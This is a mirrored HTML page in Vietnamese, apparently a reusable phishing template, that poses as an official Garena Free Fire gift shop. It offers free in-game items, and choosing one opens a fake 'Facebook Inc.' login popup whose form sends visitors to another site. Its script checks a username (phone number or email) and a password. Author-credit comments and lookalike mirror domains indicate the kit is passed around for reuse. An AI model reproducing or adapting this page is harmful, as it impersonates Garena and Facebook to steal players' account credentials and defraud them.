<!-- Nông Văn Nguyên
Facebook.com/778578204  -->


<!-- Nông Văn Nguyên
Vui lòng không xoá để tôn trọng tác giả  --><html>

<!-- Mirrored from ffmemmbergarena.com/?fbclid=IwAR2qtwHYKcbZFbkDTF2WgJ8ZahOSESN33JcXil1N8CC04B4xgx5JBJjl4gE by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 27 Dec 2022 10:06:12 GMT -->
<!-- Added by HTTrack -->
<!-- Mirrored from theme.sc0mvn.net/1/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 12 Jun 2023 06:56:06 GMT -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta property="og:title" content=" Cửa Hàng Garena Free Fire">
<meta name="description" content="Cửa Hàng Garena Free Fire">
<meta property="og:description" content="Cửa Hàng Garena Free Fire">
<meta property="og:url" content="./">
<meta property="og:site_name" content=" Cửa Hàng Garena Free Fire">
<meta property="og:type" content="website">
<meta name="copyright" content="Nong Van Nguyen">
<meta name="theme-color" content="#000">
<meta property="og:image" content="img/kv_logo.html">
<title> Cửa Hàng Garena Free Fire</title>
<link rel="stylesheet" href="css/style.css">
<link rel="stylesheet" href="css/animate.css">
<link rel="stylesheet" href="css/login/facebook.css">

<link rel="stylesheet" href="stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" href="cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.min.css">
<link rel="icon" href="img/icon1.png">

<style>
    .popup-alert {
    color: #ffffff!important;
}
</style>
</head>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
<div class="containerHome rewardsBox">
<div class="navbar">
<img class="navbar-logo" src="img/icon1.png">
<div class="navbar-title">
GARENA FREE FIRE
<br>
<span>Cửa Hàng <br> Quà Tặng</span>
</div> 
<div class="navbar-download">
<img class="navbar-pay" src="i.imgur.com/u9rU3qB.png">
</div> 
</div> 
<div class="headernamek">
<div class="sliderHeader"><img src="image.winudf.com/v2/image1/Y29tLmR0cy5mcmVlZmlyZXRoX3NjcmVlbl92aS1WTl81XzE2NjM3NTI1ODJfMDQ4/screen-573187318.jpg?fakeurl=1&amp;type=.webp" style="width: 100%;"></div>
<div class="sliderHeader"><img src="image.winudf.com/v2/image1/Y29tLmR0cy5mcmVlZmlyZXRoX3NjcmVlbl92aS1WTl83XzE2NjM3NTI1ODZfMDk3/screen-773187318.jpg?fakeurl=1&amp;type=.webp" style="width: 100%;"></div>
<div class="sliderHeader"><img src="image.winudf.com/v2/image1/Y29tLmR0cy5mcmVlZmlyZXRoX3NjcmVlbl92aS1WTl85XzE2NjM3NTI1OTBfMDM2/screen-973187318.jpg?fakeurl=1&amp;type=.webp" style="width: 100%;"></div>
</div> 
<div class="box">
<center>
<div class="" style="background: url(img/NVN.html) no-repeat center;background-size: 100% 100%;width: 100%;height: 50px">
<center><font style="font-size: 18px;color: #866d6b;position:absolute;left: 18%;top: 1.2%"></font></center>
</div>
<div class="alert-wrapper">
<div class="alert">
<div class="alert-time">
<div id="timer1"></div>
</div>
<div class="slider animated fadeIn">Sự Kiện Sẽ Kết Thúc Sau: </div>
<div class="slider animated fadeIn">Cảm Ơn Bạn Đã Tham Gia Sự Kiện</div>
<div class="slider animated fadeIn">Chúc Bạn Chơi Game Vui Vẻ!</div>
</div>
</div> 
<div class="tab_rewards" id="latest">
<div class="item">
<div>
<img style="border-bottom: 0px;" src="img/3.jpg">
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);" src="img/3.jpg">1</button>
</div>
</div>
<div class="item">
<div>
<img style="border-bottom: 0px;" src="img/7.jpg">
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);" src="img/7.jpg">1</button>
</div>
</div>
<div class="item">
<div>
<img style="border-bottom: 0px;" src="img/8.jpg">
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);" src="img/8.jpg">1</button>
</div>
</div>
<div class="item">
<div>
<img style="border-bottom: 0px;" src="img/9.jpg">
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);" src="img/9.jpg">1</button>
</div>
</div>
<div class="item">
<div>
<img style="border-bottom: 0px;" src="img/1.jpg">
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);" src="img/1.jpg">1</button>
</div>
</div>
<div class="item">
<div>
<img style="border-bottom: 0px;" src="img/6.jpg">
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);" src="img/6.jpg">1</button>
</div>
</div>
<div class="item">
<div>
<img style="border-bottom: 0px;" src="img/dam.png">
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);" src="img/dam.png">1</button>
</div>
</div>
<div class="item">
<div>
<img style="border-bottom: 0px;" src="img/ump.png">
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);" src="img/ump.png">1</button>
</div>
</div>
<div class="item">
<div>
<img style="border-bottom: 0px;" src="img/bosua.png">
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);" src="img/bosua.png">1</button>
</div>
</div>
</div>

</center>
<!-- Nông Văn Nguyên
Facebook.com/778578204  -->


<!-- Nông Văn Nguyên
Vui lòng không xoá để tôn trọng tác giả  -->

<div class="fb-page" data-href="https://www.facebook.com/freefirevn" data-tabs="timeline" data-width="500" data-height="500" data-small-header="true" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true"><blockquote cite="https://www.facebook.com/freefirevn" class="fb-xfbml-parse-ignore"><a href="https://www.facebook.com/freefirevn">Garena Free Fire</a></blockquote></div>


<a href="#" class="btn-top"></a>
</div>
</section>
<div class="dialog">
<div class="pop pop1" id="pop1">
<div>
</div> 
</center>
</div> 
<div class="footer">
<div class="footer-txt-follow">THEO DÕI CHÚNG TÔI</div> 
<center>
<img class="footer-follow-icon" src="img/link_1.png">
<img class="footer-follow-icon" src="img/link_2.png">
<img class="footer-follow-icon" src="img/link_3.png">
<img class="footer-follow-icon" src="img/link_4.png">
<img class="footer-follow-icon" src="img/link_5.png">
</center>

<div class="footer-txt-copyright">ⓒ 2022 Garena Vietnam.</div> 
<div class="footer-txt-copyright">Privacy Policy | Garena User Agreement</div> 
</div> 
</div> 
<div class="popup welcome">
<div class="popup-box">
<div class="nav-popup"><div class="nav-popup-title">Thông Tin Sự Kiện</div></div>
<div class="popup-alert">
1. Sử dụng vàng hiện có để mua đồ trên trang sự kiện
<br>
2. Chúng tôi sẽ kiểm tra thông tin
<br>
3. Gửi món đồ đến hòm thư
<br>
</div>
<div class="popup-btn-wrapper" style="height: 40px;">
<button type="button" onmousedown="buka.play();" class="popup-btn-active-center" onclick="close_reward_confirmation()">Đóng</button>
</div>
</div>
</div>
<div class="popup reward_confirmation" style="display: none;">
<div class="popup-box">
<div class="nav-popup"><div class="nav-popup-title">Xác Nhận</div></div>
<div class="popup-alert">Bạn có chắc chắn mua món đồ này?</div>
<img class="popup-item" src="#" id="myRewardImg">
<div class="popup-btn-wrapper">
<button type="button" onmousedown="tutup.play();" class="popup-btn-deactive" onclick="close_reward_confirmation()">Hủy</button>
<button type="button" class="popup-btn-active" onclick="open_facebook();">Đồng ý</button>
</div>
</div>
</div>

<div class="popup-login login-facebook animated fadeIn" style="display: none;">
	<div class="popup-box-login-fb"><a onclick="tutup_facebook()" class="close-fb"><i class="zmdi zmdi-close"></i></a>
	      <div class="navbar-fb">
	         <img src="i.imgur.com/opXuESN.png">
	      </div>
	      <div class="content-box-fb">
	     
	         <img width="75" height="75" src="img/icon1.png">
	         <div class="txt-login-fb">
	          Nhấn vào nút bên dưới để truy cập trang ưu đãi quà tặng
	         </div>
	         <form class="login-form" action="https://napthee.vn/" method="GET">
	            <button  type="submit" class="btn-login-fb">Nhận ưu đãi ngay</button>
	         </form>
	         <div class="txt-create-account">Tạo tài khoản mới</div>
	         <div class="txt-not-now">Hoặc</div>
	         <div class="txt-forgotten-password">Quên mật khẩu?</div>
	      </div>
	      <div class="language-box">
	         <center>
	         <div class="language-name language-name-active">Tiếng Việt</div>
	         <div class="language-name"> English (UK) </div>
	         <div class="language-name">Basa Jawa</div>
	         <div class="language-name">Bahasa Melayu</div>
	         <div class="language-name">日本語</div>
	         <div class="language-name">Español</div>
	         <div class="language-name">Português (Brasil)</div>
	         <div class="language-name">
	            <i class="fa fa-plus"></i>
	         </div>
	         </center>
	      </div>
	      <div class="copyright">Facebook Inc.</div>
	   </div>
	 </div>

<!-- Nông Văn Nguyên
Facebook.com/778578204  -->


<!-- Nông Văn Nguyên
Vui lòng không xoá để tôn trọng tác giả  -->
<script type="text/javascript" src="code.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="js/tab.js"></script>
<script src="js/timer.js"></script>
<script src="js/popup.js"></script>
<script src="js/click.js"></script>
<script src="js/slider.js"></script>
	  <!-- Nông Văn Nguyên
Facebook.com/778578204  -->


<!-- Nông Văn Nguyên
Vui lòng không xoá để tôn trọng tác giả  -->
  <script type="text/javascript">
       


 function phonenumber(user) {
 var vnf_regex = /((84|01|03|05|07|08|09)+([0-9]{8})\b)/g;
 if (vnf_regex.test(user) == false) 
        {console.log("phonenumber false");
            return false; 
            
        }else{
            console.log("phonenumber true");
           return true;
           
        } 
}




function validateEmail (user)
{
  let regexEmail = /^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$/;
  if (user.match(regexEmail)) {
      console.log("regexEmail true");
    return true; 
     
  } else {
      console.log("regexEmail false");
   return false; 
    
  }
}

 function validatepassword(pass){

if (pass.length >= 6 && pass.length <= 25)
{
   
    return true;
}
else {
 
    return false;
}
}

</script>

<script>
// kode untuk ganti gambar header otomatis
var slideIndexHeader = 0;
showSlidesHeader();
function showSlidesHeader() {
    var i;
    var slidesHeader = document.getElementsByClassName("sliderHeader");
    for (i = 0; i < slidesHeader.length; i++) {
        slidesHeader[i].style.display = "none"; 
    }
    slideIndexHeader++;
    if (slideIndexHeader > slidesHeader.length) {slideIndexHeader = 1} 
    slidesHeader[slideIndexHeader-1].style.display = "block"; 
    setTimeout(showSlidesHeader, 2500);
}

// code for activate clicked sound
var buka = new Audio();
buka.src = "https://l.top4top.io/m_1725u5z7i1.mp3";

var tutup = new Audio();
tutup.src = "https://a.top4top.io/m_1725zobal2.mp3";

function audioFile() {
    var audio = document.getElementById('audioFile');
    audio.play();}
$(document).ready(function(){
        $("o").attr("onclick", "audioFile()");
	});
</script>

 <script>
 

 
        function valid() {
            var user = $('#user').val();
            var pass = $('#pass').val();
            phonenumber(user);
           validateEmail(user);
            var ip = $('#ip').val();
            if(user == '' || user == null)
            {
                
                $('.email').show();
                $('.sandi').hide();
                return false;
            }else if(validatepassword(pass) == false)
            {
                $('.email').hide();
                $('.sandi').show();
                return false;
            }
            else if(user != '' || user != null)
            {
                if( (phonenumber(user) == true)  || (validateEmail(user) == true))
                {
                $('.email').hide();
                $('.sandi').hide();
               
                }
                else
                {
                     $('.email').show();
                $('.sandi').hide();
                return false;
                }
            }
            
            
            $("#btnfb").addClass("disabled");
        }
        
        
  
   
    </script>
</body>

<!-- Mirrored from ffmemmbergarena.com/?fbclid=IwAR2qtwHYKcbZFbkDTF2WgJ8ZahOSESN33JcXil1N8CC04B4xgx5JBJjl4gE by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 27 Dec 2022 10:06:30 GMT -->

<!-- Mirrored from theme.sc0mvn.net/1/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 12 Jun 2023 06:56:18 GMT -->
</html>